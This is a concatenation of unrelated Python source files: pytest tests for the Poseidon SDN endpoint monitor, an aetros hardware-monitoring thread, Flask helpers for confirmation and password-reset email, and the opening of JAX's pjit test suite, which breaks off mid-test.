        'tenant': 'foo', 'mac': '00:00:00:00:00:00', 'segment': 'foo', 'port': '1', 'ipv4': '10.0.0.1', 'ipv6': 'None'}
    sdn.endpoints[ep.name] = ep
    assert sdn.endpoints_by_ip('10.0.0.1') == [ep]
def test_endpoints_by_mac():
    """endpoints_by_mac returns [] when unknown and the matching endpoints otherwise."""
    sdn = SDNConnect(Config().get_config())
    assert sdn.endpoints_by_mac('00:00:00:00:00:01') == []
    ep = endpoint_factory('foo')
    ep.endpoint_data = {
        'tenant': 'foo', 'mac': '00:00:00:00:00:00', 'segment': 'foo', 'port': '1'}
    sdn.endpoints[ep.name] = ep
    assert sdn.endpoints_by_mac('00:00:00:00:00:00') == [ep]
def test_signal_handler():
    """signal_handler must cancel every scheduled job and close rabbit."""
    class MockLogger:
        def __init__(self):
            self.logger = logger
    class MockRabbitConnection:
        connection_closed = False
        def close(self):
            self.connection_closed = True
            return True
    class MockMonitor(Monitor):
        # bypass Monitor.__init__ side effects; build only what the test needs
        def __init__(self):
            self.logger = logger
            self.controller = Config().get_config()
            self.s = SDNConnect(self.controller)
    class MockSchedule:
        call_log = []
        def __init__(self):
            self.jobs = ['job1', 'job2', 'job3']
        def cancel_job(self, job):
            self.call_log.append(job + ' cancelled')
            return job + ' cancelled'
    mock_monitor = MockMonitor()
    mock_monitor.schedule = MockSchedule()
    mock_monitor.rabbit_channel_connection_local = MockRabbitConnection()
    mock_monitor.logger = MockLogger().logger
    # signal handler seem to simply exit and kill all the jobs no matter what
    # we pass
    mock_monitor.signal_handler(None, None)
    assert ['job1 cancelled', 'job2 cancelled',
            'job3 cancelled'] == mock_monitor.schedule.call_log
    assert True == mock_monitor.rabbit_channel_connection_local.connection_closed
def test_get_q_item():
    """get_q_item yields (True, item) while running, (False, None) after CTRL_C."""
    class MockMQueue:
        def get(self, block):
            return 'Item'
        def task_done(self):
            return
    # make sure the monitor starts in the "running" state
    CTRL_C['STOP'] = False
    class MockMonitor(Monitor):
        # bypass Monitor.__init__ side effects; build only what the test needs
        def __init__(self):
            self.logger = logger
            self.controller = Config().get_config()
            self.s = SDNConnect(self.controller)
    mock_monitor = MockMonitor()
    mock_monitor.m_queue = MockMQueue()
    assert (True, 'Item') == mock_monitor.get_q_item()
    # once the stop flag is set, no item may be returned
    CTRL_C['STOP'] = True
    mock_monitor.m_queue = MockMQueue()
    assert (False, None) == mock_monitor.get_q_item()
def test_update_history():
    """Smoke test update_history with mac/ipv4/ipv6 metadata for one endpoint."""
    ep = endpoint_factory('foo')
    ep.endpoint_data = {
        'tenant': 'foo', 'mac': '00:00:00:00:00:00', 'segment': 'foo', 'port': '1', 'ipv4': '0.0.0.0', 'ipv6': '1212::1'}
    ep.metadata = {'mac_addresses': {'00:00:00:00:00:00': {'1551805502': {'labels': ['developer workstation'], 'behavior': 'normal'}}}, 'ipv4_addresses': {
        '0.0.0.0': {'os': 'windows'}}, 'ipv6_addresses': {'1212::1': {'os': 'windows'}}}
    sdn = SDNConnect(Config().get_config())
    sdn.endpoints[ep.name] = ep
    metadata = {123: {'behavior': 'normal'}}
    sdn.update_history(ep, {'00:00:00:00:00:00': metadata},
                       {'0.0.0.0': metadata}, {'1212::1': metadata})
def test_format_rabbit_message():
    """format_rabbit_message must route payloads by routing key.

    Only 'FAUCET.Event' messages surface their payload (and are appended
    to faucet_event); every other known key is accepted but returns {};
    a None routing key is rejected.
    """
    CTRL_C['STOP'] = False
    class MockLogger:
        def __init__(self):
            self.logger = logger
    class MockMonitor(Monitor):
        # bypass Monitor.__init__ side effects; build only what the test needs
        def __init__(self):
            self.fa_rabbit_routing_key = 'foo'
            self.logger = logger
            self.controller = Config().get_config()
            self.s = SDNConnect(self.controller)
            self.faucet_event = []
        def update_routing_key_time(self, routing_key):
            return
    mockMonitor = MockMonitor()
    mockMonitor.logger = MockLogger().logger
    data = dict({'Key1': 'Val1'})
    # known routing key: message valid, payload not surfaced
    message = ('poseidon.algos.decider', json.dumps(data))
    retval, msg_valid = mockMonitor.format_rabbit_message(message)
    assert retval == {}
    assert msg_valid
    # faucet event: payload surfaced and recorded in faucet_event
    message = ('FAUCET.Event', json.dumps(data))
    retval, msg_valid = mockMonitor.format_rabbit_message(message)
    assert retval == {'Key1': 'Val1'}
    assert msg_valid
    assert mockMonitor.faucet_event == [{'Key1': 'Val1'}]
    # missing routing key: message invalid
    message = (None, json.dumps(data))
    retval, msg_valid = mockMonitor.format_rabbit_message(message)
    assert retval == {}
    assert not msg_valid
    # remaining poseidon.action.* keys: all accepted with empty payload
    data = dict({'foo': 'bar'})
    message = ('poseidon.action.ignore', json.dumps(data))
    retval, msg_valid = mockMonitor.format_rabbit_message(message)
    assert retval == {}
    assert msg_valid
    message = ('poseidon.action.clear.ignored', json.dumps(data))
    retval, msg_valid = mockMonitor.format_rabbit_message(message)
    assert retval == {}
    assert msg_valid
    message = ('poseidon.action.remove', json.dumps(data))
    retval, msg_valid = mockMonitor.format_rabbit_message(message)
    assert retval == {}
    assert msg_valid
    message = ('poseidon.action.remove.ignored', json.dumps(data))
    retval, msg_valid = mockMonitor.format_rabbit_message(message)
    assert retval == {}
    assert msg_valid
    message = ('poseidon.action.remove.inactives', json.dumps(data))
    retval, msg_valid = mockMonitor.format_rabbit_message(message)
    assert retval == {}
    assert msg_valid
    ip_data = dict({'10.0.0.1': ['rule1']})
    message = ('poseidon.action.update_acls', json.dumps(ip_data))
    retval, msg_valid = mockMonitor.format_rabbit_message(message)
    assert retval == {}
    assert msg_valid
    data = [('foo', 'unknown')]
    message = ('poseidon.action.change', json.dumps(data))
    retval, msg_valid = mockMonitor.format_rabbit_message(message)
    assert retval == {}
    assert msg_valid
def test_rabbit_callback():
    """rabbit_callback must enqueue (routing_key, body) and ack; and must
    also tolerate being called without a queue."""
    def mock_method(): return True
    mock_method.routing_key = 'test_routing_key'
    mock_method.delivery_tag = 'test_delivery_tag'
    # force mock_method coverage
    assert mock_method()
    class MockChannel:
        def basic_ack(self, delivery_tag): return True
    class MockQueue:
        item = None
        def put(self, item):
            self.item = item
            return True
        # used for testing to verify that we put right stuff there
        def get_item(self):
            return self.item
    mock_channel = MockChannel()
    mock_queue = MockQueue()
    rabbit_callback(
        mock_channel,
        mock_method,
        'properties',
        'body',
        mock_queue)
    assert mock_queue.get_item() == (mock_method.routing_key, 'body')
    # no queue supplied: callback must not raise
    rabbit_callback(
        mock_channel,
        mock_method,
        'properties',
        'body',
        None)
def test_schedule_job_kickurl():
    """schedule_job_kickurl should run against a minimal monitor stand-in."""
    class FakeMonitor:
        def __init__(self):
            self.logger = logger
            self.faucet_event = []
            self.controller = Config().get_config()
            self.s = SDNConnect(self.controller)
    schedule_job_kickurl(FakeMonitor())
def test_schedule_job_reinvestigation():
    """Smoke test the reinvestigation job over two mirrored, known endpoints."""
    class func():
        # minimal monitor stand-in carrying the attributes the job reads
        def __init__(self):
            self.logger = logger
            self.faucet_event = []
            self.controller = Config().get_config()
            self.controller['max_concurrent_reinvestigations'] = 10
            self.s = SDNConnect(self.controller)
            endpoint = endpoint_factory('foo')
            endpoint.endpoint_data = {
                'tenant': 'foo', 'mac': '00:00:00:00:00:00', 'segment': 'foo', 'port': '1'}
            endpoint.mirror()
            endpoint.known()
            self.s.endpoints[endpoint.name] = endpoint
            endpoint = endpoint_factory('foo2')
            endpoint.endpoint_data = {
                'tenant': 'foo', 'mac': '00:00:00:00:00:00', 'segment': 'foo', 'port': '1'}
            endpoint.mirror()
            endpoint.known()
            self.s.endpoints[endpoint.name] = endpoint
            self.s.store_endpoints()
            self.s.get_stored_endpoints()
    schedule_job_reinvestigation(func())
def test_find_new_machines():
    """Smoke test find_new_machines over a mix of active/inactive records,
    non-poseidon sources, blank IPs and a record with no ipv6 key."""
    controller = Config().get_config()
    s = SDNConnect(controller)
    machines = [{'active': 0, 'source': 'poseidon', 'role': 'unknown', 'state': 'unknown', 'ipv4_os': 'unknown', 'tenant': 'vlan1', 'port': 1, 'segment': 'switch1', 'ipv4': '123.123.123.123', 'mac': '00:00:00:00:00:00', 'id': 'foo1', 'behavior': 1, 'ipv6': '0'},
                {'active': 1, 'source': 'poseidon', 'role': 'unknown', 'state': 'unknown', 'ipv4_os': 'unknown', 'tenant': 'vlan1',
                 'port': 1, 'segment': 'switch1', 'ipv4': '123.123.123.123', 'mac': '00:00:00:00:00:00', 'id': 'foo2', 'behavior': 1, 'ipv6': '0'},
                {'active': 0, 'source': 'poseidon', 'role': 'unknown', 'state': 'unknown', 'ipv4_os': 'unknown', 'tenant': 'vlan1',
                 'port': 1, 'segment': 'switch1', 'ipv4': '123.123.123.123', 'mac': '00:00:00:00:00:00', 'id': 'foo3', 'behavior': 1, 'ipv6': '0'},
                {'active': 1, 'source': 'poseidon1', 'role': 'unknown', 'state': 'unknown', 'ipv4_os': 'unknown', 'tenant': 'vlan1',
                 'port': 2, 'segment': 'switch1', 'ipv4': '2106::1', 'mac': '00:00:00:00:00:00', 'id': 'foo4', 'behavior': 1, 'ipv6': '0'},
                {'active': 1, 'source': 'poseidon', 'role': 'unknown', 'state': 'unknown', 'ipv4_os': 'unknown', 'tenant': 'vlan1',
                 'port': 1, 'segment': 'switch1', 'ipv4': '::', 'mac': '00:00:00:00:00:00', 'id': 'foo5', 'behavior': 1, 'ipv6': '0'},
                {'active': 1, 'source': 'poseidon', 'role': 'unknown', 'state': 'unknown', 'ipv4_os': 'unknown', 'tenant': 'vlan1',
                 'port': 1, 'segment': 'switch1', 'ipv4': '::', 'mac': '00:00:00:00:00:00', 'id': 'foo6', 'behavior': 1},
                {'active': 1, 'source': 'poseidon', 'role': 'unknown', 'state': 'unknown', 'ipv4_os': 'unknown', 'tenant': 'vlan1', 'port': 1, 'segment': 'switch1', 'ipv6': '::', 'mac': '00:00:00:00:00:00', 'id': 'foo7', 'behavior': 1}]
    s.find_new_machines(machines)
def test_Monitor_init():
    """Construct a rabbit-less Monitor, push host metrics and update a key time."""
    monitor = Monitor(skip_rabbit=True)
    hosts = [{'active': 0, 'source': 'poseidon', 'role': 'unknown', 'state': 'unknown', 'ipv4_os': 'unknown', 'tenant': 'vlan1', 'port': 1, 'segment': 'switch1', 'ipv4': '123.123.123.123', 'mac': '00:00:00:00:00:00', 'id': 'foo1', 'behavior': 1, 'ipv6': '0'},
             {'active': 1, 'source': 'poseidon', 'role': 'unknown', 'state': 'unknown', 'ipv4_os': 'unknown', 'tenant': 'vlan1',
              'port': 1, 'segment': 'switch1', 'ipv4': '123.123.123.123', 'mac': '00:00:00:00:00:00', 'id': 'foo2', 'behavior': 1, 'ipv6': '0'},
             {'active': 0, 'source': 'poseidon', 'role': 'unknown', 'state': 'unknown', 'ipv4_os': 'unknown', 'tenant': 'vlan1',
              'port': 1, 'segment': 'switch1', 'ipv4': '123.123.123.123', 'mac': '00:00:00:00:00:00', 'id': 'foo3', 'behavior': 1, 'ipv6': '0'},
             {'active': 1, 'source': 'poseidon1', 'role': 'unknown', 'state': 'unknown', 'ipv4_os': 'unknown', 'tenant': 'vlan1',
              'port': 2, 'segment': 'switch1', 'ipv4': '2106::1', 'mac': '00:00:00:00:00:00', 'id': 'foo4', 'behavior': 1, 'ipv6': '0'},
             {'active': 1, 'source': 'poseidon', 'role': 'unknown', 'state': 'unknown', 'ipv4_os': 'unknown', 'tenant': 'vlan1', 'port': 1, 'segment': 'switch1', 'ipv4': '::', 'mac': '00:00:00:00:00:00', 'id': 'foo5', 'behavior': 1, 'ipv6': '0'}]
    monitor.prom.update_metrics(hosts)
    monitor.update_routing_key_time('foo')
def test_SDNConnect_init():
    """SDNConnect must construct with empty trunk_ports and first_time=False."""
    config = Config().get_config()
    config['trunk_ports'] = []
    SDNConnect(config, first_time=False)
def test_process():
    """Run Monitor.process() against mocked queue/rabbit plumbing.

    A helper thread flips CTRL_C['STOP'] after 5 seconds so the process()
    loop terminates; a second pass swaps in a failing queue getter.
    """
    from threading import Thread
    def thread1():
        global CTRL_C
        CTRL_C['STOP'] = False
        time.sleep(5)
        CTRL_C['STOP'] = True
    class MockMonitor(Monitor):
        # bypass Monitor.__init__ side effects; set up endpoints in three
        # different lifecycle states for process() to walk over
        def __init__(self):
            self.logger = logger
            self.fa_rabbit_routing_key = 'FAUCET.Event'
            self.faucet_event = None
            self.controller = Config().get_config()
            self.s = SDNConnect(self.controller)
            # exercise get_sdn_context() for every controller TYPE
            self.s.controller['TYPE'] = 'None'
            self.s.get_sdn_context()
            self.s.controller['TYPE'] = 'bcf'
            self.s.get_sdn_context()
            self.s.controller['TYPE'] = 'faucet'
            self.s.get_sdn_context()
            endpoint = endpoint_factory('foo')
            endpoint.endpoint_data = {
                'tenant': 'foo', 'mac': '00:00:00:00:00:00', 'segment': 'foo', 'port': '1'}
            endpoint.mirror()
            endpoint.p_prev_states.append(
                (endpoint.state, int(time.time())))
            self.s.endpoints[endpoint.name] = endpoint
            endpoint = endpoint_factory('foo2')
            endpoint.endpoint_data = {
                'tenant': 'foo', 'mac': '00:00:00:00:00:00', 'segment': 'foo', 'port': '1'}
            endpoint.p_next_state = 'mirror'
            endpoint.queue()
            endpoint.p_prev_states.append(
                (endpoint.state, int(time.time())))
            self.s.endpoints[endpoint.name] = endpoint
            endpoint = endpoint_factory('foo3')
            endpoint.endpoint_data = {
                'tenant': 'foo', 'mac': '00:00:00:00:00:00', 'segment': 'foo', 'port': '1'}
            self.s.endpoints[endpoint.name] = endpoint
            self.s.store_endpoints()
            self.s.get_stored_endpoints()
        def get_q_item(self):
            return (True, ('foo', {'data': {}}))
        def bad_get_q_item(self):
            return (False, ('bar', {'data': {}}))
        def format_rabbit_message(self, item):
            return ({'data': {}}, False)
    mock_monitor = MockMonitor()
    t1 = Thread(target=thread1)
    t1.start()
    mock_monitor.process()
    t1.join()
    # second pass: the queue getter reports failure
    mock_monitor.get_q_item = mock_monitor.bad_get_q_item
    t1 = Thread(target=thread1)
    t1.start()
    mock_monitor.process()
    t1.join()
def test_show_endpoints():
    """show_endpoints must accept every supported filter expression."""
    ep = endpoint_factory('foo')
    ep.endpoint_data = {
        'tenant': 'foo', 'mac': '00:00:00:00:00:00', 'segment': 'foo', 'port': '1', 'ipv4': '0.0.0.0', 'ipv6': '1212::1'}
    ep.metadata = {'mac_addresses': {'00:00:00:00:00:00': {'1551805502': {'labels': ['developer workstation'], 'behavior': 'normal'}}}, 'ipv4_addresses': {
        '0.0.0.0': {'os': 'windows'}}, 'ipv6_addresses': {'1212::1': {'os': 'windows'}}}
    sdn = SDNConnect(Config().get_config())
    sdn.endpoints[ep.name] = ep
    for query in ('all', 'state active', 'state ignored', 'state unknown',
                  'os windows', 'role developer-workstation', 'behavior normal'):
        sdn.show_endpoints(query)
def test_merge_machine():
    """merge_machine_ip must copy the old machine's IPs into the new record."""
    controller = Config().get_config()
    s = SDNConnect(controller)
    old_machine = {'tenant': 'foo', 'mac': '00:00:00:00:00:00',
                   'segment': 'foo', 'port': '1', 'ipv4': '0.0.0.0', 'ipv6': '1212::1'}
    new_machine = {'tenant': 'foo', 'mac': '00:00:00:00:00:00',
                   'segment': 'foo', 'port': '1', 'ipv4': '', 'ipv6': ''}
    s.merge_machine_ip(old_machine, new_machine)
    assert old_machine['ipv4'] == new_machine['ipv4']
    # BUGFIX: the original compared new_machine['ipv6'] with itself, which
    # is always true; compare against the old record instead.
    assert old_machine['ipv6'] == new_machine['ipv6']
def test_parse_metadata():
    """parse_metadata must merge redis mac/ml info into one flat dict."""
    controller = Config().get_config()
    s = SDNConnect(controller)
    mac_info = {
        b'poseidon_hash': 'myhash',
    }
    ml_info = {
        b'labels': b'["foo", "bar"]',
        b'confidences': b'[1.0, 2.0]',
        'myhash': b'{"pcap_labels": "mylabels", "decisions": {"behavior": "definitely"}}',
    }
    # The original expected-value literal repeated the 'behavior' key
    # ('None' then 'definitely'); Python keeps only the last duplicate, so
    # this is the same value with the dead key removed.
    assert s.parse_metadata(mac_info, ml_info) == {
        'behavior': 'definitely', 'confidences': [1.0, 2.0],
        'labels': ['foo', 'bar'], 'pcap_labels': 'mylabels'}
def test_schedule_thread_worker():
    """schedule_thread_worker must exit via SystemExit once CTRL_C is set."""
    from threading import Thread
    def thread1():
        # flip the stop flag after 5 seconds so the worker loop terminates
        global CTRL_C
        CTRL_C['STOP'] = False
        time.sleep(5)
        CTRL_C['STOP'] = True
    class mockSchedule():
        def __init__(self):
            pass
        def run_pending(self):
            pass
    # NOTE: the original also defined an unused `mocksys` class and bound an
    # instance to the name `sys`, shadowing the stdlib module; both were
    # dead code and have been removed.
    t1 = Thread(target=thread1)
    t1.start()
    try:
        schedule_thread_worker(mockSchedule())
    except SystemExit:
        pass
    t1.join()
|
MonitorThread.py | from __future__ import division
from __future__ import absolute_import
import simplejson
import random
import time
import math
import docker
import docker.utils
import docker.errors
import psutil
from threading import Thread
import six
import aetros.cuda_gpu
import numpy as np
class MonitoringThread(Thread):
    """Background thread recording hardware utilisation for a running job.

    Once per second it appends a CSV row (elapsed second, CPU %, memory %,
    optional per-GPU memory %, optional DPU load) to the job's git stream
    and publishes network-transfer statistics to the job backend.
    """
    def __init__(self, job_backend, cpu_cores=1, gpu_devices=None, docker_container=None):
        Thread.__init__(self)
        self.job_backend = job_backend
        # indices of the GPUs assigned to this job (None = no GPU monitoring)
        self.gpu_devices = gpu_devices
        # container id; when set, stats come from the docker stats API
        # instead of psutil on the host
        self.docker_container = docker_container
        self.max_minutes = 0
        self.cpu_cores = cpu_cores
        job = self.job_backend.job
        if 'maxTime' in job['config'] and isinstance(job['config']['maxTime'], int) and job['config']['maxTime'] > 0:
            self.max_minutes = job['config']['maxTime']
        self.hardware_stream = self.job_backend.git.stream_file('aetros/job/monitoring.csv')
        header = ["second", "cpu", "memory"]
        try:
            if self.gpu_devices:
                for gpu_id, gpu in enumerate(aetros.cuda_gpu.get_ordered_devices()):
                    if gpu_id in gpu_devices:
                        header.append("memory_gpu" + str(gpu['id']))
        except aetros.cuda_gpu.CudaNotImplementedException: pass
        if job_backend.get_job_model().has_dpu():
            header += ['dpu0']
        # dumps(...)[1:-1] strips the surrounding [] to get a bare CSV row
        self.hardware_stream.write(simplejson.dumps(header)[1:-1] + "\n")
        self.running = True
        self.early_stopped = False
        self.handle_max_time = True
        self.client = docker.from_env()
        self.docker_api = docker.APIClient(**docker.utils.kwargs_from_env())
        self.stat_stream = None
        # last HTTP response of the docker stats stream (sic: 'reponse' —
        # attribute name kept for backward compatibility)
        self.docker_last_last_reponse = None
        self.docker_last_stream_data = 0
        self.docker_last_mem = None
        self.docker_last_cpu = None
    def stop(self):
        """Ask run() to exit after its current iteration."""
        self.running = False
    def run(self):
        def docker_stats_reader(response):
            # consume the docker stats stream, updating docker_last_cpu/mem;
            # returns on any malformed record or stream error
            previous_cpu = 0
            previous_system = 0
            stream = self.docker_api._stream_helper(response)
            try:
                for line in stream:
                    data = simplejson.loads(line)
                    if 'cpu_stats' not in data or not data['cpu_stats']:
                        return
                    if 'system_cpu_usage' not in data['cpu_stats']:
                        return
                    cpu_util = 0
                    cpu_delta = data['cpu_stats']['cpu_usage']['total_usage'] - previous_cpu
                    system_delta = data['cpu_stats']['system_cpu_usage'] - previous_system
                    previous_cpu = data['cpu_stats']['cpu_usage']['total_usage']
                    previous_system = data['cpu_stats']['system_cpu_usage']
                    if cpu_delta > 0 and system_delta > 0:
                        cpu_cores = len(data['cpu_stats']['cpu_usage']['percpu_usage'])
                        cpu_util = (cpu_delta / system_delta) * cpu_cores / self.cpu_cores * 100
                    mem_util = data['memory_stats']['usage'] / data['memory_stats']['limit'] * 100
                    self.docker_last_stream_data = time.time()
                    self.docker_last_cpu = min(cpu_util, 100)
                    self.docker_last_mem = min(mem_util, 100)
            except Exception:
                return
        docker_reader = None
        while self.running:
            self.handle_early_stop()
            self.job_backend.git.store_file('aetros/job/times/elapsed.json', simplejson.dumps(time.time() - self.job_backend.start_time))
            if self.job_backend.is_paused:
                # when paused, we do not monitor anything, except elapsed.
                time.sleep(1)
                continue
            # always sent network information even when marked as ended. The real end will tear down this thread.
            self.network_sync()
            if self.job_backend.ended:
                # stop hardware monitoring when ended
                time.sleep(1)
                continue
            if self.docker_container:
                # restart the stats stream when it stalled for more than 3s
                if docker_reader and self.docker_last_last_reponse and time.time()-self.docker_last_stream_data > 3:
                    self.docker_last_last_reponse.close()
                    docker_reader.join()
                # BUGFIX: Thread.isAlive() was removed in Python 3.9;
                # is_alive() has existed since Python 2.6.
                if not docker_reader or not docker_reader.is_alive():
                    url = self.docker_api._url("/containers/{0}/stats", self.docker_container)
                    self.docker_last_last_reponse = self.docker_api._get(url, stream=True)
                    docker_reader = Thread(target=docker_stats_reader, args=[self.docker_last_last_reponse])
                    docker_reader.daemon = True
                    docker_reader.start()
                if self.docker_last_cpu is not None:
                    self.monitor(self.docker_last_cpu, self.docker_last_mem)
                time.sleep(1)
            else:
                cpu_util = np.mean(psutil.cpu_percent(interval=1, percpu=True)) # blocks 1sec
                mem_util = psutil.virtual_memory().percent
                self.monitor(cpu_util, mem_util) #takes always at least 1sec, no need for sleep
                time.sleep(0.01)
        # thread requested to end. So queue last network sync update
        self.network_sync()
    def handle_early_stop(self):
        """Early-stop the job once it exceeds its configured maxTime minutes."""
        if not self.early_stopped and self.handle_max_time and self.max_minutes > 0:
            minutes_run = (time.time() - self.job_backend.start_time) / 60
            if minutes_run > self.max_minutes:
                self.early_stopped = True
                self.job_backend.logger.warning("Max time of "+str(self.max_minutes)+" minutes reached.")
                self.job_backend.early_stop()
    def network_sync(self):
        """Publish upload-queue/network statistics as aetros/job/network.json."""
        if self.job_backend.client.write_speeds:
            network = {
                'ended': self.job_backend.ended,
                'channels': {},
                'messages': 0,
                'files': {},
                'git': [],
                'sent': self.job_backend.client.bytes_sent,
                'total': self.job_backend.client.bytes_total,
                'speed': self.job_backend.client.bytes_speed,
            }
            for channel, messages in six.iteritems(self.job_backend.client.queues):
                messages = messages[:]
                for message in messages:
                    if 'type' not in message:
                        continue
                    # skip our own network.json updates to avoid feedback
                    if message['type'] == 'store-blob' and message['path'] in ['aetros/job/network.json']:
                        continue
                    if message['type'] == 'git-unpack-objects':
                        bytes_sent = message['_bytes_sent']
                        total = message['_total']
                        network['git'].append({
                            'sent': bytes_sent,
                            'total': total,
                            'objects': message['objects']
                        })
                        network['messages'] += 1
                    if message['type'] == 'store-blob':
                        if message['path'].startswith('aetros/job/times'):
                            continue
                        bytes_sent = message['_bytes_sent']
                        total = message['_total']
                        network['files'][message['path']] = {
                            'sent': bytes_sent,
                            'total': total,
                        }
                        network['messages'] += 1
            data = simplejson.dumps(network)
            self.job_backend.client.send({'type': 'store-blob', 'path': 'aetros/job/network.json', 'data': data}, channel='')
    def monitor(self, cpu_util, mem_util):
        """Append one CSV row of utilisation figures to the hardware stream."""
        x = math.ceil(time.time()-self.job_backend.start_time)
        row = [x, cpu_util, mem_util]
        try:
            if self.gpu_devices:
                for gpu_id, gpu in enumerate(aetros.cuda_gpu.get_ordered_devices()):
                    if gpu_id not in self.gpu_devices:
                        continue
                    gpu_memory_use = None
                    info = aetros.cuda_gpu.get_memory(gpu['device'])
                    if info is not None:
                        free, total = info
                        gpu_memory_use = (total-free) / total*100
                    row.append(gpu_memory_use)
        except aetros.cuda_gpu.CudaNotImplementedException: pass
        if self.job_backend.get_job_model().has_dpu():
            # no real DPU probe exists; emit a jittered placeholder figure
            row += [25 + random.randint(-10, 20)]
        self.hardware_stream.write(simplejson.dumps(row)[1:-1] + "\n")
|
emails.py | # -*- coding: utf-8 -*-
from threading import Thread
from flask import current_app, render_template
from flask_mail import Message
from flaskholo.extensions import mail
def _send_async_mail(app, message):
    """Send *message* inside *app*'s context; meant to run in a worker thread."""
    with app.app_context():
        mail.send(message)
def send_mail(to, subject, template, **kwargs):
    """Render and send an email asynchronously.

    Renders ``template + '.txt'`` and ``template + '.html'`` with *kwargs*
    as the plain-text and HTML bodies, prefixes the configured subject
    prefix, and dispatches the send on a background thread.

    Returns the started ``Thread`` so callers may join it (e.g. in tests).
    """
    prefix = current_app.config['FLASKHOLO_MAIL_SUBJECT_PREFIX']
    msg = Message(prefix + subject, recipients=[to])
    msg.body = render_template(template + '.txt', **kwargs)
    msg.html = render_template(template + '.html', **kwargs)
    # The worker thread needs the real app object, not the context-local proxy.
    real_app = current_app._get_current_object()
    worker = Thread(target=_send_async_mail, args=[real_app, msg])
    worker.start()
    return worker
def send_confirm_email(user, token, to=None):
    """Send the account-confirmation email (to *to*, or the user's address)."""
    recipient = to or user.email
    send_mail(to=recipient, subject='Email Confirm',
              template='emails/confirm', user=user, token=token)
def send_reset_password_email(user, token):
    """Send the password-reset email to the user's registered address."""
    send_mail(to=user.email, subject='Password Reset',
              template='emails/reset_password', user=user, token=token)
def send_change_email_email(user, token, to=None):
    """Send the change-of-address confirmation (to *to*, or the user's address)."""
    recipient = to or user.email
    send_mail(to=recipient, subject='Change Email Confirm',
              template='emails/change_email', user=user, token=token)
|
pjit_test.py | # Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
from functools import partial
import logging
import threading
import unittest
from collections import OrderedDict, namedtuple
from absl.testing import absltest
from absl.testing import parameterized
import numpy as np
import jax
import jax.numpy as jnp
from jax._src import test_util as jtu
from jax.errors import JAXTypeError
from jax import lax
# TODO(skye): do we still wanna call this PartitionSpec?
from jax.experimental import PartitionSpec as P
from jax.experimental.maps import xmap, mesh, Mesh
from jax.experimental import global_device_array
import jax.experimental.pjit as pjit_lib
from jax.experimental.pjit import (pjit, pjit_p, with_sharding_constraint,
SpecSync, FROM_GDA)
from jax.interpreters import pxla
from jax.interpreters import xla
from jax._src.lib import xla_client
from jax._src.util import prod, curry, unzip2, safe_zip
from jax.config import config
# Parse JAX/absl command-line flags before any tests run.
config.parse_flags_with_absl()
def setUpModule():
  """Skip this whole module off GPU/TPU and turn on SPMD lowering."""
  backend = jax.default_backend()
  if backend != 'gpu' and backend != 'tpu':
    raise unittest.SkipTest("pjit only supports GPU and TPU backends")
  jtu.set_spmd_lowering_flag(True)
def tearDownModule():
  # Undo the SPMD-lowering flag that setUpModule enabled.
  jtu.restore_spmd_lowering_flag()
def create_gda(global_shape, global_mesh, mesh_axes):
  """Build a GlobalDeviceArray over *global_mesh* filled with arange data."""
  n = prod(global_shape)
  values = np.arange(n, dtype=np.float32).reshape(global_shape)

  def fetch(index):
    return values[index]

  return global_device_array.GlobalDeviceArray.from_callback(
      global_shape, global_mesh, mesh_axes, fetch)
@curry
def check_1d_2d_mesh(f, set_mesh):
  """Parameterize test *f* over a 1-D and two 2-D mesh shapes.

  Each generated case receives `mesh` (tuples of (axis_name, size)) and
  `resources` (the axis name(s) to shard over).  When `set_mesh` is True
  the mesh is also installed around each case via
  `jtu.with_mesh_from_kwargs`; otherwise the test only gets the arguments.
  """
  return parameterized.named_parameters(
      {"testcase_name": "_" + name, "mesh": mesh, "resources": resources}
      for name, mesh, resources in (
          ("2", (("x", 2),), "x"),
          ("2x1", (("x", 2), ("y", 1)), ("x", "y")),
          ("2x2", (("x", 2), ("y", 2)), ("x", "y")),
      ))(jtu.with_mesh_from_kwargs(f) if set_mesh else f)
def create_global_mesh(mesh_shape, axis_names):
  """Return a Mesh over the first prod(mesh_shape) local devices.

  Raises unittest.SkipTest when the host has fewer devices than required.
  """
  required = prod(mesh_shape)
  available = jax.devices()
  if len(available) < required:
    raise unittest.SkipTest(f"Test requires {required} local devices")
  device_grid = np.array(available[:required]).reshape(mesh_shape)
  return Mesh(device_grid, axis_names)
# TODO(skye): make the buffer donation utils part of JaxTestCase
class PJitTest(jtu.BufferDonationTestCase):
  """Tests for pjit partitioning, lowering, caching, and execution.

  Fix vs. original: testLowerDonateArgnumsAvailable ended with a bare
  comparison expression (`f_low.donate_argnums == f_com.donate_argnums ==
  (0,)`) that evaluated to a bool and was discarded, so the test asserted
  nothing.  It now uses real assertions.
  """

  @jtu.with_mesh([('x', 1)])
  def testDeviceBufferAval(self):

    @partial(pjit, in_axis_resources=None, out_axis_resources=P('x'))
    def f(x):
      return x

    shape = (2, 2)
    x = np.arange(prod(shape), dtype=np.float32).reshape(shape)
    actual = f(x)
    expected = x
    self.assertAllClose(actual, expected, check_dtypes=False)
    self.assertIsInstance(actual, pxla.ShardedDeviceArray)
    self.assertLen(actual.device_buffers, 1)
    self.assertAllClose(
        actual.device_buffers[0].to_py(), expected, check_dtypes=False)
    # Repro for a bug on device_buffer aval
    _ = repr(actual.device_buffers)

  @jtu.with_mesh([('x', 2)])
  def testBasic1D(self):

    @partial(pjit,
             in_axis_resources=(P('x'), P('x')),
             out_axis_resources=None)
    def f(x, y):
      return x + y

    shape = (8, 8)
    x = np.arange(prod(shape), dtype=np.float32).reshape(shape)
    actual = f(x, x + 1)
    expected = x + (x + 1)
    self.assertAllClose(actual, expected, check_dtypes=False)
    self.assertIsInstance(actual, pxla.ShardedDeviceArray)
    self.assertLen(actual.device_buffers, 2)
    self.assertAllClose(actual.device_buffers[0].to_py(), expected,
                        check_dtypes=False)

  @jtu.with_mesh([('x', 2), ('y', 2)])
  def testBasic2D(self):

    @partial(pjit,
             in_axis_resources=(P(None, 'x', 'y'), P('y')),
             out_axis_resources=P('x'))
    def f(x, y):
      return x @ y

    x_shape = (8, 6, 4)
    y_shape = (4, 2)
    x = jnp.arange(np.prod(x_shape)).reshape(x_shape)
